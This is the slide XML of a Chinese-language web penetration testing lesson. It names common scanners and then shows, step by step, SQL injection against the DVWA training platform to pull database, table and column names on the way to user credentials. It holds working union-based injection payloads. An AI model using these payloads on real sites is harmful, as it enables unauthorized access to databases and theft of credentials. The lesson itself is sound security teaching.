              </a:rPr>
              <a:t>“users”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>列</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</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720090" lvl="0" indent="609600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="200" checksum="4158780845"/>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select column_name from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information_schema.columns</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where table_name='users';</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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="400050"/>
            <a:ext cx="1080000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00" y="1350000"/>
            <a:ext cx="10800000" cy="5055870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5、获取DVWA平台的用户名和密码</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lvl="0" indent="0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【说明</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2</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r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入攻击获取网站数据库中用户名和密码的步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</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914400" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="300" checksum="2447643177"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> （1） 猜解SQL查询语句中的字段数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</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914400" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="300" checksum="2447643177"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> （2） 获取当前数据库；</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914400" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="300" checksum="2447643177"/>
                </a:ext>
              </a:extLst>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（3） 获取</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当前数据库中的表名</a:t>
            </a:r>
            <a:r>
              <a:rPr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914400" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="300" checksum="2447643177"/>
                </a:ext>
              </a:extLst>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（4） 获取表中的字段；</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marL="0" lvl="1" indent="914400" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="300" checksum="2447643177"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（5） 获取用户名和密码。</a:t>
            </a:r>
            <a:endParaRPr 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7" name="标题 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="400050"/>
            <a:ext cx="1080000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【任务分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1741805"/>
            <a:ext cx="10515600" cy="3491865"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>渗透测试工具很多，这里只介绍3个常用的工具。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AWVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OWASP-ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是漏洞扫描工具，可以快速帮助我们发现漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Burp Suite是较为常用的渗透测试平台，帮助我们完成对Web应用程序的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>渗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>透测试。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>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90" y="1350010"/>
            <a:ext cx="10800080" cy="4988560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5、获取DVWA平台的用户名和密码</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="3048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（1）猜解SQL查询语句中的字段数：</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① 注入：1' order by 1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正常</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显示结果。</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② 注入：1' order by 2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正常</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显示结果。</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lvl="1"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③ 注入：1' order by 3 #，页面显示报错。</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根据①、②、③的结果，</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可以判断SQL查询语句中只有两个字段。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101"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2" name="图片 -2147482595"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3333600" y="2632075"/>
            <a:ext cx="5272405" cy="1071880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 34"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3333600" y="4085273"/>
            <a:ext cx="5269230" cy="1058545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 -2147482593"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4269600" y="5518150"/>
            <a:ext cx="3665220" cy="318135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="65000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId10"/>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90" y="1350010"/>
            <a:ext cx="10800080" cy="312610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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、获取DVWA平台的用户名和密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="3048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（2）获取当前使用的数据库名 </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1066800" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="350" checksum="2733040107"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union select database(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="2000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cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="2000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cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="2000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黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="4572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150" checksum="3873463059"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从结果可知：</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数据库名为</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dvwa</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609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2962275" y="2580640"/>
            <a:ext cx="6267450" cy="1266825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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20000" y="1350000"/>
            <a:ext cx="10800000" cy="482409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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"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获取DVWA平台的用户名和密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="3048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（3）获取当前数据库中的表名</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1080135" eaLnBrk="0" fontAlgn="auto"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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union select table_name,2 from information_schema.tables where table_schema='dvwa' #</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b="1"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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101"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从显示结果</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可以推断：users表用来存放用户信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">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4" name="图片 25"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2142000" y="2933046"/>
            <a:ext cx="7918450" cy="2132819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId6"/>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1"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文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1350010"/>
            <a:ext cx="10800080" cy="531177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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"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获取DVWA平台的用户名和密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
